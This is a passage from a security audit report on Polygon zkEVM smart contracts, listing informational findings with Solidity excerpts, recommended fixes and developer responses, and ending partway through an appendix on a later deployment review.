The algorithm to combine the mainnetExitRoot and rollupExitRoot is implemented in several locations in the code. This could be abstracted in contract PolygonZkEVMBridge, especially because this will be enhanced when more L2s are added. 30 contract PolygonZkEVMGlobalExitRoot is ... { function updateExitRoot(bytes32 newRoot) external { ... bytes32 newGlobalExitRoot = keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ,→ ); // first ... } function getLastGlobalExitRoot() public view returns (bytes32) { return keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ); // second } } contract PolygonZkEVMBridge is ... { function _verifyLeaf(..., bytes32 mainnetExitRoot, bytes32 rollupExitRoot, ...) ... { ... uint256 timestampGlobalExitRoot = globalExitRootManager .globalExitRootMap( keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot)) ); // third ,→ ... } } Recommendation: Consider using functions like the functions below: function calculateGlobalExitRoot(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (bytes32) { return keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot) ); ,→ } The following function is useful to prevent having to call globalExitRootManager twice from PolygonZkEVMBridge. function globalExitRootMapCalculated(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (bytes32) { return globalExitRootMap[calculateGlobalExitRoot(mainnetExitRoot, rollupExitRoot)]; ,→ } Polygon-Hermez: We created a library to abstract this calculation: GlobalExitRootLib.sol. We didn’t put it in the PolygonZkEVMGlobalExitRoot, since then it should also be put in PolygonZkEVMGlobalExitRootL2 and that contract should be as simple as possible and shouldn’t have to be updated when adding new networks. Solved in PR 88. Spearbit: Verified. 5.4.8 ETH honeypot on L2 Severity: Informational Context: genesis-gen.json#L9 Description: The initial ETH allocation to the Bridge contract on L2 is rather large: 2E8 ETH on the test network and 1E11 ETH on the production network according to the documentation. This would make the bridge a large honey pot, even more than other bridges. If someone would be able to retrieve the ETH they could exchange it with all available other coins on the L2, bridge them back to mainnet, and thus steal about all TVL on the L2. Recommendation: A possible solution could be • Have a cold wallet contract on L2 that contains the bulk of the ETH. • Have a function that can only transfer ETH to the bridge contract (the bridge contract must be able to receive this). • A government action could trigger the ETH transfer to the bridge; making sure there is a sufficiently large amount for any imaginable bridge action. 31 • Alternatively this action could be permissionless, but that would require implementing time and amount limits, which would complicate the contract. Polygon-Hermez: An alternative to pre-minting could be to have a function to mint ETH, which we decided not to implement because it is too risky. If the bridge would be taken over then there are several other ways to steal the TVL. Any solutions would complicate the logic and introduce more risk, especially if human interaction is involved. Spearbit: Acknowledged. 5.4.9 Allowance is not required to burn wrapped tokens Severity: Informational Context: TokenWrapped.sol#L62-L64 Description: The burn of tokens of the deployed TokenWrapped doesn’t use up any allowance, because the Bridge has the right to burn the wrapped token. Normally a user would approve a certain amount of tokens and then do an action (e.g. bridgeAsset()). This could be seen as an extra safety precaution. So you lose the extra safety this way and it might be unexpected from the user’s point of view. However, it’s also very convenient to do a one-step bridge (comparable to using the permit). Note: most other bridges do it also this way. function burn(address account, uint256 value) external onlyBridge { _burn(account, value); } Recommendation: Document the behavior so users are aware an allowance is not required. Polygon-Hermez: Will be added to the documentation and a comment is added in PR 88. Spearbit: Verified. 5.4.10 Messages are lost when delivered to EOA by claimMessage() Severity: Informational Context: PolygonZkEVMBridge.sol#L388-L436 Description: The function claimMessage() calls the function onMessageReceived() via a low-level call. When the receiving address doesn’t contain a contract the low-level call still succeeds and delivers the ETH. The documen- tation says: "... IBridgeMessageReceiver interface and such interface must be fulfilled by the receiver contract, it will ensure that the receiver contract has implemented the logic to handle the message." As we understood from the project this behavior is intentional. It can be useful to deliver ETH to Externally owned accounts (EOAs), however, the message (which is the main goal of the function) isn’t interpreted and thus lost, without any notification. The loss of the delivery of the message to EOAs (e.g. non contracts) might not be obvious to the casual readers of the code/documentation. function claimMessage(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, "PolygonZkEVMBridge::claimMessage: Message failed"); ... } Recommendation: Doublecheck this behavior is true as intended. Add comments about EOAs in the code and clarify them in the documentation. 32 Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.4.11 Replace assembly of _getSelector() with Solidity Severity: Informational Context: PolygonZkEVMBridge.sol#L611-L736 Description: The function _getSelector() gets the first four bytes of a series of bytes and used assembly. This can also be implemented in Solidity, which is easier to read. function _getSelector(bytes memory _data) private pure returns (bytes4 sig) { assembly { sig := mload(add(_data, 32)) } } function _permit(..., bytes calldata permitData) ... { bytes4 sig = _getSelector(permitData); ... } Recommendation: Consider using the following way to retrieve the first four bytes and remove function _getSe- lector() function _permit(..., bytes calldata permitData) ... { - + bytes4 sig = _getSelector(permitData); bytes4 sig = bytes4(permitData[:4]); Polygon-Hermez: Solved in PR 82. Spearbit: Verified. 5.4.12 Improvement suggestions for Verifier.sol Severity: Informational Context: Verifier.sol#L14, IVerifierRollup.sol Description: Verifier.sol is a contract automatically generated by snarkjs and is based on the template ver- ifier_groth16.sol.ejs. There are some details that can be improved on this contract. However, changing it will require doing PRs for the Snarkjs project. Recommendation: We have the following improvement suggestions: • Change to Solidity version 0.8.x because version 0.6.11 is older and misses overflow/underflow checks. Also, rest of the PolygonZkEVM uses version 0.8.x. This will also allow using custom errors. • Use uint256 instead of uint, because then its immediately clear how large the uints are. • Doublecheck sub(gas(), 2000 in the staticcall()s, as it might not be necessary anymore after the Tan- gerine Whistle fork because only 63/64 of the gas is sent. • Generate an explicit interface file like IVerifierRollup.sol and let Verifier.sol inherit this to make sure they are compatible. We also have these suggestions for gas optimizations: • uint q in function negate() could be a constant; • uint256 snark_scalar_field in function verify() could be a constant; • remove switch success case 0 { invalid() } } as it is redundant with the require() after it; • in function pairing() store the i*6 in a tmp variable; • in function verifyProof() use return (verify(inputValues, proof) == 0);. 33 Polygon-Hermez: These are great suggestions, but it requires some time to analyze if these optimizations are completely safe so we will postpone it to add them in future versions. Spearbit: Acknowledged. 5.4.13 Variable named incorrectly Severity: Informational Context: PolygonZkEVM.sol#L854 Description: Seems like the variable veryBatchTimeTarget was meant to be named verifyBatchTimeTarget as evidenced from the comment below: // Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET Recommendation: Rename the variable veryBatchTimeTarget to verifyBatchTimeTarget. Also, rename the event SetVeryBatchTimeTarget to SetVerifyBatchTimeTarget In case if the variable is named correctly then update the comment below: // Check if timestamp is above or below the veryBatchTimeTarget Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.4.14 Add additional comments to function forceBatch() Severity: Informational Context: PolygonZkEVM.sol#L920-L966 Description: The function forceBatch() contains a comment about synch attacks. what is meant by that. The team explained the following: It’s not immediately clear • Getting the call data from an EOA is easy/cheap so no need to put the transactions in the event (which is expensive). • Getting the internal call data from internal transactions (which is done via a smart contract) is complicated (because it requires an archival node) and then it’s worth it to put the transactions in the event, which is easy to query. function forceBatch(...) ... { ... // In order to avoid synch attacks, if the msg.sender is not the origin // Add the transaction bytes in the event if (msg.sender == tx.origin) { emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, ""); } else { emit ForceBatch(lastForceBatch,lastGlobalExitRoot,msg.sender,transactions); } } Recommendation: Add additional comments to the function forceBatch() to explain the approach taken. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 34 5.4.15 Check against MAX_VERIFY_BATCHES Severity: Informational Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L545-L611, PolygonZkEVM.sol#L972-L1054 **Description:**In several functions a comparison is made with < MAX_VERIFY_BATCHES. This should probably be <= MAX_VERIFY_BATCHES, otherwise, the MAX will never be reached. uint64 public constant MAX_VERIFY_BATCHES = 1000; function sequenceForceBatches(ForcedBatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... require(batchesNum < MAX_VERIFY_BATCHES, ... ); ... } function sequenceBatches(BatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... require(batchesNum < MAX_VERIFY_BATCHES, ...); ... } function verifyBatches(...) ... { ... require(finalNewBatch - initNumBatch < MAX_VERIFY_BATCHES, ... ); ... } Recommendation: Double-check the conclusion and consider applying these changes -require( ... < MAX_VERIFY_BATCHES, ... ); +require( ... <= MAX_VERIFY_BATCHES, ... ); Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.4.16 Prepare for multiple aggregators/sequencers to improve availability Severity: Informational Context: PolygonZkEVM.sol#L377-L391 Description: As long are there is one (trusted)sequencer and one (trusted)aggregator the availability risks are relatively high. However, the current code isn’t optimized to support multiple trusted sequencers and multiple trusted aggregators. modifier onlyTrustedSequencer() { require(trustedSequencer == msg.sender, ... ); _; } modifier onlyTrustedAggregator() { require(trustedAggregator == msg.sender, ... ); _; } Recommendation: It might be useful to make small changes in the code to support multiple trusted sequencers and multiple trusted aggregators to improve availability. Polygon-Hermez: Since the trustedSequencer/trustedAggregator address can be changed, if we want to sup- port multiple trusted actors or/and add a consensus layer to coordinate them this will be delegated in the future by another smart contract. 35 Spearbit: Acknowledged. 5.4.17 Temporary Fund freeze on using Multiple Rollups Severity: Informational Context: PolygonZkEVMBridge.sol#L157-L165 Description: Claiming of Assets will freeze temporarily if multiple rollups are involved as shown below. The asset will be lost if the transfer is done between: a. Mainnet -> R1 -> R2 b. R1 -> R2 -> Mainnet 1. USDC is bridged from Mainnet to Rollover R1 with its metadata. 2. User claims this and a new Wrapped token is prepared using USDC token and its metadata. bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals); 3. Let’s say the User bridge this token to Rollup R2. This will burn the wrapped token on R1 if (tokenInfo.originTokenAddress != address(0)) { // The token is a wrapped token from another network // Burn tokens TokenWrapped(token).burn(msg.sender, amount); originTokenAddress = tokenInfo.originTokenAddress; originNetwork = tokenInfo.originNetwork; } 4. The problem here is now while bridging the metadata was not set. 5. So once the user claims this on R2, wrapped token creation will fail since abi.decode on empty metadata will fail to retrieve name, symbol,... The asset will be temporarily lost since it was bridged properly but cannot be claimed Showing the transaction chain Mainnet bridgeAsset(usdc,R1,0xUser1, 100, “) • Transfer 100 USDC to Mainnet M1 • originTokenAddress=USDC • originNetwork = Mainnet • metadata = (USDC,USDC,6) • Deposit node created R1 claimAsset(...,Mainnet,USDC,R1,0xUser1,100, metadata = (USDC,USDC,6)) • Claim verified • Marked claimed • tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC • tokenInfoToWrappedToken[Mainnet,USDC] created using metadata = (USDC,USDC,6) • User minted 100 amount of tokenInfoToWrappedToken[Mainnet, USDC] bridgeAsset(tokenInfoToWrappedToken[Mainnet,USDC],R2,0xUser2, 100, “) • Burn 100 tokenInfoToWrappedToken[Mainnet,USDC] • originTokenAddress=USDC • originNetwork = Mainnet 36 • metadata = "" • Deposit node created with empty metadata R2 claimAsset(...,Mainnet,USDC,R2,0xUser2,100, metadata = "") • Claim verified • Marked claimed • tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC • Since metadata = "" , abi decode fails Recommendation: Since the current system does not have multiple rollups currently so marking this issue infor- mational. But in the future when multiple rollups are in place, this code needs to be upgraded to retrieve metadata during burn while bridging which will ensure recipient rollup to correctly decode metadata Polygon-Hermez: We will take this into account if we upgrade the system to support multiple rollups. Spearbit: Acknowledged. 5.4.18 Off by one error when comparing with MAX_TRANSACTIONS_BYTE_LENGTH constant Severity: Informational Context: PolygonZkEVM.sol#L933, PolygonZkEVM.sol#L471 Description: When comparing against MAX_TRANSACTIONS_BYTE_LENGTH, the valid range should be <= instead of <. require( transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, "PolygonZkEVM::forceBatch: Transactions bytes overflow" ); require( currentBatch.transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, "PolygonZkEVM::sequenceBatches: Transactions bytes overflow" ); Recommendation: Consider using <= instead of <. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.4.19 trustedAggregatorTimeout value may impact batchFees Severity: Informational Context: PolygonZkEVM.sol#L855-L858 , PolygonZkEVM.sol#L557-L562 Description: If trustedAggregatorTimeout and veryBatchTimeTarget are valued nearby then all batches veri- fied by 3rd party will be above target (totalBatchesAboveTarget) and this would impact batch fees. 1. Let’s say veryBatchTimeTarget is 30 min and trustedAggregatorTimeout is 31 min. 2. Now anyone can call verifyBatches only after 31 min due to the below condition. 37 require( ); sequencedBatches[finalNewBatch].sequencedTimestamp + trustedAggregatorTimeout <= block.timestamp, "PolygonZkEVM::verifyBatches: Trusted aggregator timeout not expired" 3. This means _updateBatchFee can at minimum be called after 31 min of sequencing by a nontrusted aggre- gator. 4. The below condition then always returns true. if ( // 31>30 ) { block.timestamp - currentSequencedBatchData.sequencedTimestamp >veryBatchTimeTarget Recommendation: As mentioned by the product team, the trustedAggregatorTimeout value is only meant to be high at initialization and emergency time, during which 3rd party aggregation should not happen, thus preventing the issue For time part from initialization and emergency, trustedAggregatorTimeout is meant to move towards 0 value. Hence it could be documented as a reference to Admin that Admin should always take care to set the value lower than veryBatchTimeTarget during normal scenarios. Polygon-Hermez: Add a comment in PR 88. Spearbit: Verified. 5.4.20 Largest allowed batch fee multiplier is 1023 instead of 1024 Severity: Informational Context: PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L133 Description: Per the setMultiplierBatchFee function, the largest allowed batch fee multiplier is 1023. /** * @notice Allow the admin to set a new multiplier batch fee * @param newMultiplierBatchFee multiplier bathc fee */ function setMultiplierBatchFee( uint16 newMultiplierBatchFee ) public onlyAdmin { require( newMultiplierBatchFee >= 1000 && newMultiplierBatchFee < 1024, "PolygonZkEVM::setMultiplierBatchFee: newMultiplierBatchFee incorrect range" ); multiplierBatchFee = newMultiplierBatchFee; emit SetMultiplierBatchFee(newMultiplierBatchFee); } However, the comment mentioned that the largest allowed is 1024. // Batch fee multiplier with 3 decimals that goes from 1000 - 1024 uint16 public multiplierBatchFee; Recommendation: The implementation should be consistent with the comment and vice versa. Therefore, con- sider updating the implementation to allow the largest batch fee multiplier to be 1024 or update the comment accordingly. Polygon-Hermez: The comment is updated in PR 87. 38 Spearbit: Verified. 5.4.21 Deposit token associated Risk Awareness Severity: Informational Context: PolygonZkEVMBridge.sol#L129 Description: The deposited tokens locked in L1 could be at risk due to external conditions like the one shown below: 1. Assume there is a huge amount of token X being bridged to roll over. 2. Now mainnet will have a huge balance of token X. 3. Unfortunately due to a hack or LUNA like condition, the project owner takes a snapshot of the current token X balance for each user address and later all these addresses will be airdropped with a new token based on screenshot value. 4. In this case, token X in mainnet will be screenshot but at disbursal time the newly updated token will be airdropped to mainnet and not the user. 5. Now there is no emergencywithdraw method to get these airdropped funds out. 6. For the users, if they claim funds they still get token X which is worthless. Recommendation: Update the documentation to make users aware of such edge cases and possible actions to be taken Polygon-Hermez: This is not an scenario that affects only our zkevm, but a scenario that affects all contracts (defi, bridges, etc...). User usually notice this kind of situations, that’s why usually will move their funds back to their mainnet address. For those who don’t know about this situation, usually projects that make this kind of airdrops warns users about this conditions. Nevertheless the project could even airdrop the corresponding funds in L2, but this will always be responsibility of the project. Spearbit: Acknowledged. 5.4.22 Fees might get stuck when Aggregator is unable to verify Severity: Informational Context: PolygonZkEVM.sol#L523 Description: The collected fees from Sequencer will be stuck in the contract if Aggregator is unable to verify the batch. In this case, Aggregator will not be paid and the batch transaction fee will get stuck in the contract Recommendation: In the future if these collected fees become significant then a temporary contract upgrade may be required to allow transferring these funds. Polygon-Hermez: This is intended, the fees must be stuck in the contract until an aggregator verifies batches. In another way, if the fees could be retrieved from the contract, the aggregator reward could be stolen. Makes sense that aggregators do not receive rewards if the network is stopped. In case an aggregator is unable to verify a batch, then the whole system will be blocked. The aggregator fees might be a problem, but a very small one compared with a whole network that is stopped ( or at least the withdrawals are stopped), so technically all the bridge funds will be blocked, which is a bigger problem, and for sure we will need an upgrade if this happens In summary, the point is that we are making everything to avoid this situation, but if this happens, then anyway an upgrade must be necessary, we don’t think it’s worth putting any additional mechanism in this regard. Spearbit: Acknowledged. 39 5.4.23 Consider using OpenZeppelin’s ECDSA library over ecrecover Severity: Informational Context: TokenWrapped.sol#L100 Description: As stated here, ecrecover is vulnerable to a signature malleability attack. While the code in permit is not vulnerable since a nonce is used in the signed data, I’d still recommend using OpenZeppelin’s ECDSA library, as it does the malleability safety check for you as well as the signer != address(0) check done on the next line. Recommendation: Replace the ecrecover call with an ECDSA.recover() call. Polygon-Hermez: We prefer to use this approach since does not perform additional checks, is more gas efficient and simpler and it’s used by very common projects like UNI. Spearbit: Acknowledged. 5.4.24 Risk of transactions not yet in Consolidated state on L2 Severity: Informational Context: PolygonZkEVMBridge.sol#L540-L548 Description: There is are relatively long period for batches and thus transactions are to be between Trusted state and Consolidated state. Normally around 30 minutes but in exceptional situations up to 2 weeks. On the L2, users normally interact with the Trusted state. However, they should be aware of the risk for high-value transactions (especially for transactions that can’t be undone, like transactions that have an effect outside of the L2, like off ramps, OTC transactions, alternative bridges, etc). There will be custom RPC endpoints that can be used to retrieve status information, see zkevm.go. Recommendation: Make sure to document the risk of transactions that are not consolidated yet on L2. Polygon-Hermez: We will add a comment regarding this in the documentation. We also want to add this informa- tion into the block explorer, similar on how optimism is doing it: optimistic.etherscan. In the field blockNumber put extra information like: confirmed by sequencer, virtual state, consolidate state. Spearbit: Acknowledged. 5.4.25 Delay of bridging from L2 to L1 Severity: Informational Context: PolygonZkEVMBridge.sol#L540-L548 Description: The bridge uses the Consolidated state while bridging from L2 to L1 and the user interface It can take between 15 min and 1 hour.". Other (opti- public.zkevm-test.net, shows "Waiting for validity proof. mistic) bridges use liquidity providers who take the risk and allow users to retrieve funds in a shorter amount of time (for a fee). Recommendation: Consider implementing a mechanism to reduce the time to bridge from L2 to L1. Polygon-Hermez: We do not plan to implement the such mechanism. We consider that the 15min-1hour is an acceptable delay since it’s a typical timing is most CEX, so users are already used to this timing for being able to withdraw funds. In case it becomes a must for the users, we expect that other projects can deploy on top of our system and provide such solutions with some incentives mechanism using the messages between layers. Spearbit: Acknowledged. 40 5.4.26 Missing Natspec documentation Severity: Informational Context: PolygonZkEVM.sol#L672, PolygonZkEVM.sol#L98 Description: Some NatSpec comments are either missing or are incomplete. • Missing NatSpec comment for pendingStateNum: /** * @notice Verify batches internal function * @param initNumBatch Batch which the aggregator starts the verification * @param finalNewBatch Last batch aggregator intends to verify * @param newLocalExitRoot * @param newStateRoot New State root once the batch is processed * @param proofA zk-snark input * @param proofB zk-snark input * @param proofC zk-snark input */ function _verifyBatches( New local exit root once the batch is processed uint64 pendingStateNum, uint64 initNumBatch, uint64 finalNewBatch, bytes32 newLocalExitRoot, bytes32 newStateRoot, uint256[2] calldata proofA, uint256[2][2] calldata proofB, uint256[2] calldata proofC ) internal { • Missing NatSpec comment for pendingStateTimeout: /** * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed ,→ * and avoid stack too deep errors. * @param admin Admin address * @param chainID L2 chainID * @param trustedSequencer Trusted sequencer address * @param forceBatchAllowed Indicates wheather the force batch functionality is available * @param trustedAggregator Trusted aggregator * @param trustedAggregatorTimeout Trusted aggregator timeout */ struct InitializePackedParameters { address admin; uint64 chainID; address trustedSequencer; uint64 pendingStateTimeout; bool forceBatchAllowed; address trustedAggregator; uint64 trustedAggregatorTimeout; } Recommendation: Add or complete missing NatSpec comments. Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 41 5.4.27 _minDelay could be 0 without emergency Severity: Informational Context: PolygonZkEVMTimelock.sol#L40-L46 Description: Normally min delay is only supposed to be 0 when in an emergency state. But this could be made to 0 even in nonemergency mode as shown below: 1. Proposer can propose an operation for changing _minDelay to 0 via updateDelay function. 2. Now, if this operation is executed by the executor then _minDelay will be 0 even without an emergency state. **Recommendation:**Override updateDelay function and impose a minimum timelock delay preventing 0 delay OR Update docs to make users aware of such scenario(s) so that they can take a decision if such a proposal ever arrives Polygon-Hermez: Being able to update the delay to 0 is the standard in most Timelock implementations, including the one followed by Openzepplin, we don’t see a reason to change its default behavior. Since this is the default behavior, users are already aware of this scenario. Spearbit: Acknowledged. 5.4.28 Incorrect/incomplete comment Severity: Informational Context: Mentioned in Recommendation Description: There are a few mistakes in the comments that can be corrected in the codebase. Recommendation: • PolygonZkEVM.sol#L1106: This function is used for configuring the pending state timeout. - * @notice Allow the admin to set a new trusted aggregator timeout + * @notice Allow the admin to set a new pending state timeout • PolygonZkEVMBridge.sol#L217: Function also sends ETH, would be good to add that to the NatSpec. - * @notice Bridge message + * @notice Bridge message and send ETH value • PolygonZkEVMBridge.sol#L69: A developer assumption is not documented. + * @notice The value of `_polygonZkEVMaddress` on the L2 deployment of the contract will be `address(0)`, so ,→ + * emergency state is not possible for the L2 deployment of the bridge, intentionally • PolygonZkEVM.sol#L141: The comment is not synchronized with the ForcedBatchData struct. It should be minForcedTimestamp instead of minTimestamp for the last parameter. // hashedForcedBatchData: hash containing the necessary information to force a batch: - // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minTimestamp) + // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minForcedTimestamp) • PolygonZkEVM.sol#L522: Comment is incorrect, the sequencer actually pays collateral for every non-forced batch submitted, not for every batch submitted - // Pay collateral for every batch submitted + // Pay collateral for every non-forced batch submitted • PolygonZkEVM.sol#L864: Comment is incorrect, the actual variable updated is currentBatch not current- LastVerifiedBatch 42 - // update currentLastVerifiedBatch + // update currentBatch • PolygonZkEVM.sol#L1193: Comment seems to be copy-pasted from another method proveNonDetermin- isticPendingState, remove it or write a comment for the current function - * @notice Allows to halt the PolygonZkEVM if its possible to prove a different state root given the same batches ,→ Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 5.4.29 Typos, grammatical and styling errors Severity: Informational Context: Mentioned in Recommendation Description: There are a few typos and grammatical mistakes that can be corrected in the codebase. Some functions could also be renamed to better reflect their purposes. Recommendation: • PolygonZkEVM.sol#L671: The function _verifyBatches() does more than verifying batches. It also trans- fers matic. Therefore, it is recommended to change the function name and comment. - function _verifyBatches( + function _verifyAndRewardBatches( uint64 pendingStateNum, uint64 initNumBatch, • PolygonZkEVMBridge.sol#L37: Typo. Should be identifier instead of indentifier - // Mainnet indentifier + // Mainnet identifier • TokenWrapped.sol#L53: Typo. Should be immutable instead of inmutable - + // initialize inmutable variables // initialize immutable variables • PolygonZkEVM.sol#L407, PolygonZkEVM.sol#L970: Typo and grammatical error. Should be batches to instead of batces ot and should be Struct array which holds the necessary data instead of Struct array which the necessary data - * @param batches Struct array which the necessary data to append new batces ot the sequence + * @param batches Struct array which holds the necessary data to append new batches to the sequence ,→ • PolygonZkEVM.sol#L1502: Typo. Should be the instead of teh - * @param initNumBatch Batch which the aggregator starts teh verification + * @param initNumBatch Batch which the aggregator starts the verification • PolygonZkEVM.sol#L1396: Typo. Should be contracts instead of contrats - ,→ + ,→ * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contrats * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contracts 43 • PolygonZkEVM.sol#L1430: Typo. Should be contracts instead of contrats - ,→ + ,→ * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts • PolygonZkEVM.sol#L144: Typo. Should be contracts instead of contrats - ,→ + ,→ * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts • PolygonZkEVM.sol#L1108: Typo. Should be aggregator instead of aggreagator - + * @param newTrustedAggregatorTimeout Trusted aggreagator timeout * @param newTrustedAggregatorTimeout Trusted aggregator timeout • PolygonZkEVM.sol#L969: Grammatical error. Should be has not done so in the timeout period in- stead of do not have done it in the timeout period - * @notice Allows anyone to sequence forced Batches if the trusted sequencer do not have done it in the timeout period * @notice Allows anyone to sequence forced Batches if the trusted sequencer has not done so in the timeout period ,→ + ,→ • PolygonZkEVM.sol#L1291: Typo. Should be function instead of functoin - ,→ + ,→ * @notice Internal functoin that prove a different state root given the same batches to verify * @notice Internal function that prove a different state root given the same batches to verify • PolygonZkEVM.sol#L1062: Typo. Should be sequencer instead of sequuencer - + * @param newTrustedSequencer Address of the new trusted sequuencer * @param newTrustedSequencer Address of the new trusted sequencer • PolygonZkEVM.sol#L1094: Legacy comment. Does not make sense with current code - * If address 0 is set, everyone is free to aggregate • PolygonZkEVM.sol#L1131: Typo. Should be aggregator instead of aggreagator - + * @param newPendingStateTimeout Trusted aggreagator timeout * @param newPendingStateTimeout Trusted aggregator timeout • PolygonZkEVM.sol#L1153: Typo. Should be batch instead of bathc - + * @param newMultiplierBatchFee multiplier bathc fee * @param newMultiplierBatchFee multiplier batch fee • PolygonZkEVM.sol#L1367: Grammatical error. Should be must be equal to instead of must be equal than - ,→ + ,→ "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal than currentLastVerifiedBatch" "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal to currentLastVerifiedBatch" • PolygonZkEVM.sol#L332: Typo. Should be deep instead of depp 44 - + * @param initializePackedParameters Struct to save gas and avoid stack too depp errors * @param initializePackedParameters Struct to save gas and avoid stack too deep errors • PolygonZkEVM.sol#L85: Typo. Should be because instead of becasue - * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed ,→ + * @notice Struct to call initialize, this basically saves gas because pack the parameters that can be packed ,→ • PolygonZkEVM.sol#L59: Typo. Should be calculate instead of calcualte - * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calcualte the fees ,→ + * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calculate the fees ,→ • PolygonZkEVM.sol#L276: Typo. Should be sequencer instead of seequencer - * @dev Emitted when the admin update the seequencer URL + * @dev Emitted when the admin update the sequencer URL • PolygonZkEVM.sol#L459: Grammatical error. Should be Check global exit root exists with proper batch length. These checks are already done in the forceBatches call. instead of Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call - // Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call // Check global exit root exists with proper batch length. These checks are already done in the forceBatches call. ,→ + ,→ • PolygonZkEVM.sol#L123, PolygonZkEVM.sol#L755: Typo. Should be tries instead of trys - // This should be a protection against someone that trys to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires // This should be a protection against someone that tries to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires ,→ + ,→ - + * It trys to consolidate the first and the middle pending state * It tries to consolidate the first and the middle pending state • PolygonZkEVM.sol#L55: Grammatical error. Should be Struct which will be stored instead of Struct which will stored - + * @notice Struct which will stored for every batch sequence * @notice Struct which will be stored for every batch sequence • PolygonZkEVM.sol#L71: Grammatical error. should be will be turned off instead of will be turn off and should be in the future instead of in a future - + * This is a protection mechanism against soundness attacks, that will be turn off in a future * This is a protection mechanism against soundness attacks, that will be turned off in the future ,→ • PolygonZkEVM.sol#L90: Typo. Should be whether instead of wheather - + * @param forceBatchAllowed Indicates wheather the force batch functionality is available * @param forceBatchAllowed Indicates whether the force batch functionality is available 45 Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 5.4.30 Enforce parameters limits in initialize() of PolygonZkEVM Severity: Informational Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVM.sol#L1110-L1149 Description: The function initialize() of PolygonZkEVM doesn’t enforce limits on trustedAggregatorTime- out and pendingStateTimeout, whereas the update functions setTrustedAggregatorTimeout() and setPend- ingStateTimeout(). As the project has indicated it might be useful to set larger values in initialize(). function initialize(..., InitializePackedParameters calldata initializePackedParameters,...) ... { trustedAggregatorTimeout = initializePackedParameters.trustedAggregatorTimeout; ... pendingStateTimeout = initializePackedParameters.pendingStateTimeout; ... } function setTrustedAggregatorTimeout(uint64 newTrustedAggregatorTimeout) public onlyAdmin { require(newTrustedAggregatorTimeout <= HALT_AGGREGATION_TIMEOUT,....); ... trustedAggregatorTimeout = newTrustedAggregatorTimeout; ... } function setPendingStateTimeout(uint64 newPendingStateTimeout) public onlyAdmin { require(newPendingStateTimeout <= HALT_AGGREGATION_TIMEOUT, ... ); ... pendingStateTimeout = newPendingStateTimeout; ... } Recommendation: Consider enforcing the same limits in initialize() as in the update functions, this will make the code easier to reason about. If different limits are allowed on purpose then add some comments. Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 46 6 Appendix 6.1 Introduction On March 20th of 2023, Spearbit conducted a deployment review for Polygon zkEVM. The target of the review was zkevm-contracts on commit cddde2. Disclaimer : This security review does not guarantee against a hack. It is a snapshot in time of the deployment review for Polygon zkEVM according to the specific commit. Any modifications to the code will require a new security review. 6.2 Changes after first review Several changes have been made after the first Spearbit review conducted on January 2023 (found in the main body of this document), which include: • A change in the verifier to FflonkVerifier; • A way to delay setting the global exit root as well as updateGlobalExitRoot() in PolygonZkEVMBridge; • setForceBatchTimeout() and activateForceBatches() inPolygonZkEVM to switch on the ForceBatches mechanism on a later moment; • Several fixes and optimizations. 6.3 Results No security issues have been found in the above mentioned changes. 6.3.1 Mainnet deployment The following deployment addresses on ethereum Mainnet where checked: • PolygonZkEVM proxy • PolygonZkEVM implementation • FflonkVerifier • PolygonZkEVMBridge proxy • PolygonZkEVMBridge implementation • PolygonZkEVMGlobalExitRoot proxy • PolygonZkEVMGlobalExitRoot implementation • PolygonZkEVMDeployer • PolygonZkEVMTimelock • ProxyAdmin 6.3.2 Findings Some of the contracts have extra junk code in the etherscan verification. This is not a security risk, but could be a reputation risk. This is present in the following contracts: • PolygonZkEVMBridge proxy • ProxyAdmin Different proxy contracts are used, two based 